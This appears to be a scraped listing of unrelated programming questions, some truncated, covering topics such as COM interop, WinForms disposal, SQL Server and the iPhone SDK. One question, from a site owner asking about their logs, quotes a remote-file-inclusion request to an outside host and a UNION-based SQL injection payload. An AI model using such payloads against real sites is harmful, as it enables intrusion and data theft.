  • How to debug without Visual Studio?

    Hello, Python - c++ dll - c# dll I have a com interop c# dll that is loaded in a wrapper c++ dll throught the .tlb file generated in c# to be used in a python project. When I run in my computer it works fine but when I run in a computer that just got formated it gives: WindowsError: exception code 0xe0434f4d I have the redistribute c++ installed and the .net compact framework 3.5 on the formatted computer. How can I see what is the correct exception on a computer that does not have visual studio installed? How can I debug all of this? I can't debug the dll's itself can I? Note: in my computer all works well so maybe is some dll or file missing. I allready used Dependency Walker to see if there's some dll missing, and nop!

    We have the following method called directly from the UI thread: void DoLengthyProcessing() { DoStuff(); var items = DoMoreStuff(); //do even more stuff - 200 lines of code trimmed this.someControl.PrepareForBigThing(); //someControl is a big user control //additional 100 lines of code that access this.someControl this.someControl.Finish(items); } Many of the called methods call Application.DoEvents() (and they do so many times) (do not ask me why, this is black magic written by black magic programmers and it can not be changed because everyone is scared what the impact would be) and there is also an operation running on a background thread involved in the processing. As a result, the window is not fully nonresponsive and can be closed manually during the processing. The Dispose method of the form "releases" the someControl variable by setting it to null. As a result, in case the user closes the window during the lengthy process, a null reference exception is thrown. How to handle this gracefully without just catching and logging the exception caused by disposal? Assigning the someControl instance to a temporary variable in the beginning of the method - but the control contains many subcontrols with similar disposal scheme - sets them to null and this causes null reference exceptions in other place put if (this.IsDisposed) return; calls before every access of the someControl variable. - making the already nasty long method even longer and unreadable. in Closing event, just indicate that we should close and only hide the window. Dispose it at the end of the lengthy operation. This is not very viable because there are many other methods involved (think 20K LOC for a single control) that would need to handle this mechanism as well. How to most effectively handle window disposal (by user action) in the middle of this kind of processing?

    I'm busy implementing a Graph ADT in C++. I have templates for the Edges and the Vertices. At each Vertex I have a vector containing pointers to the Edges that are incident to it. Now I'm trying to get an iterator over those edges. These are the lines of code: vector<Edge<edgeDecor, vertexDecor, dir>*> edges = this->incidentEdges(); vector<Edge<edgeDecor, vertexDecor, dir>*>::const_iterator i; for (i = edges.begin(); i != edges.end(); ++i) { However, the compiler won't accept the middle line.     I have a site that has certain urls that point to pages with permanent data and others that point to dynamic web pages. Google indexes both these regularly. By the time a user finds one of the dynamic content urls, the data on the page has already changed and the user does not find what he was looking for. Further, the dynamic url pages contains links to the permanent urls (which I want Google or any crawler to index). Google crawler controls (webmaster tools) cannot be made to read urls from a page but not index them. Solutions? crawling strategies *system architecture*.

    I have been looking around a lot but i simply can't find a nice solution to this... Point mouse = MouseInfo.getPointerInfo().getLocation(); int dx = (BULLET_SPEED*Math.abs(x - mouse.getX()))/ (Math.abs(y - mouse.getY()) + Math.abs(x - mouse.getX()))* (x - mouse.getX())/Math.abs(x - mouse.getX()); In this constellation i get: Possible loss of precision, when i change e.g (x - mouse.getX()) to (x - mouse.getX()).doubleValue() it says double cannot be dereferenced, when i add intValue() somewhere it says int cannot be dereferenced.   • 2 or more Controls only 1 is considered Active

    I have 2 controls (MyCtrl) next to each other called ctrlLeft and ctrlRight. Whenever one receives interaction it is considered active (by default the left one). I override OnDraw and customize the look of the active one a bit. Currently I have a property Active and an event that I subscribe to from all MyCtrl in there I store a reference to the active one like this: if (sender is MyCtrl) { ctrlActive = (sender as MyCtrl); ctrlLeft.Active = !(ctrlRight.Active = (ctrlActive == ctrlRight)); } Either way I need to have ctrlActive as I use it for other things but what I am wondering is if this is the best way make them aware of each other? Another option I thought of was to store references to every possible MyCtrl and then loop through em all and activate / deactivate the one that match sender just in case I in the future add a ctrlMiddle. Are my thoughts wrong, is there better options to do this. For example, how does radiobuttons accomplish their similar functionality?

    When I get a runtime exception from the standard library, it's almost always a problem in my code and not in the library code. Is there a way to truncate the exception stack trace so that it doesn't show the guts of the library package?   • Why Do I See the "In Recovery" Msg, and How Can I Prevent it?

    The project I'm working on creates a local copy of the SQL Server database for each SVN branch you work on. We're running SQL Server 2008 Express with Advanced Services on our local machine to host it. When we create a new branch, the build script will create a new database with the ID of that branch, creates the schema objects, and copies over a selection of data from the production shadow server. After the database is created, it, or other databases on the local machine, will often go into "In Recovery" mode for several minutes. After several refreshes it comes up and is happy, but will occasionally go back into "In Recovery" mode. The database is created in simple recovery mode. The file names aren't specified, so it uses default paths for files. The size of the database after loading data is ~400 megs. It is running in SQL Server 2005 compatibility mode. The command that creates the database is: sqlcmd -S $(DBServer) -Q "IF NOT EXISTS (SELECT [name] FROM sysdatabases WHERE [name] = '$(DBName)') BEGIN CREATE DATABASE [$(DBName)]; print 'Created $(DBName)'; END" ...where $(DBName) and $(DBServer) are MSBuild parameters. I got a nice clean log file this morning. When I turned on my computer it starts all five databases. However, two of them show transactions being rolled forward and backwards.     In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example: /?x=19&y=15 The numbers are random, but its always setting x and y variables. Another category of mysterious requests: /?id=http://nic.bupt.edu.cn/media/j1.txt?? There are other attempts at injections in the request log that have straight sql written into them as well. Example: /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13-- It looks like they are all reaching a 404, but I'm still wondering about the intent behind these. I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason. Any suggestions as to what all these are?

  • jQuery Tiny Scrollbar plugin - Fails to show all content on refresh

    Hi Guys! I've implemented Tiny Scrollbar plugin on a website, for good-looking div scrolling. But weird stuff happens when I refresh the page in Safari or Chrome. It seams to clip some of my content. What happens upon a page refresh, that could make it behave like this? Please have a look at mettestentoft.dk I've tried using the same plugin on a simple test page, where a page refresh would make the plugin add a 'scrollbar disable' class to the div, while clicking a link linking to the same page, would make i show as it should. Tiny Scrollbar plugin demopage doesn't seem to have any problems, unless I'm missing it. So my question is: Do I have to do something jQuery-wise, in order for a page to load equally to a linked page? Thank you in advance :)

    Is there a way to tell a UITableView to preload all rows? The tableView is supposed to show several comments (up to 80 comments). So my CommentCell uses a Setter to adapt the cell to a specific comment. -(void)setComment:(Comment *)newComment { if (newComment != comment) { [comment release]; comment = [newComment retain]; /* * set the cells view variables here */ } } This specific setter takes quite a bunch of processing resources and scrolling gets kinda laggy. I am using a comment-specific reuseIdentifier instead of a static cellIdentifier when calling dequeueReusableCellWithIdentifier: in order to assure, that "newComment" equals the old "comment". And in fact this does work great when scrolling over cells which have already been loaded. But when scrolling through the comments for the first time, it still lags like hell. Which leads me to my question: Is there a way to tell the tableview to preload all cells? (which I doubt) or Do I have to implement my own cache instead of relying on "dequeueReusableCellWithIdentifier:"?

    I am trying to add an init() function to a MovieClip, but when I run the function from scene1 the variables that were set in the MovieClip are not defined yet... The MovieClip was dragged to the stage from the library. scene1: mc.init(null); MovieClip: var _default = 5; function init(num) { if(num == null) { trace(_default); } else { trace(num); } } This is tracing "undefined" instead of "5"; Is there a way of fixing this problem?

When I also include Record.cpp then the errors go away. Why is that? Record.h has the forward declarations for the functions it says are an undefined reference.

  • Upgrade to iPhone 3.0 sdk and now simulator shows blank screen.

    I have an iPhone app that uses an UITabBarController, which contains two UINavigationControllers, each of which in turn contains one or more TableViewControllers (actually, customized UIViewControllers implementing UITableViewDelegate and UITableViewDataSource. ) On launch, it displays the UITabBarController with one of the tableviews displayed. Everything is coded; Interface Builder was NOT used to make any of the UI stuff. It was written in SDK 2. It worked fine in sdk 2. I recently updated to SDK 3.0. In Info, I set the Base SDK setting to iPhone Simulator 3.0. Now, when I launch the application in Simulator, I see only a blank white screen with the status bar at the top. No signs of my app. However, when I exit the app, the missing tableview displays briefly as the exiting animation is playing. Also, on the blank white screen I can still click where the navigation buttons should be and find that, when I exit the app and the missing screen briefly displays, that navigation has taken me to another screen. So the buttons work, and presumably the tableviewcells are there, they just cannot be seen. Has anyone seen anything like this? Does anyone have any idea what is causing it and how I can fix it? I noticed that sample apps, such as SQLiteBooks, seem to work fine when updating to SDK 3.0. My app isn't very much different from SQLiteBooks in terms of technologies used, except that, as I said above, I do not use Interface Builder. Thanks

I never seta root password for mysql and in final step of installing wordpressit askfor root password of mysql. What is the default password for root (if there is one) and how to change it? I try mysql -u root password '123' but it show me Access denied for user 'root@localhost' (using password:NO) after this I try mysql -u root -p but it ask for a password which I don't have Thank you in advance
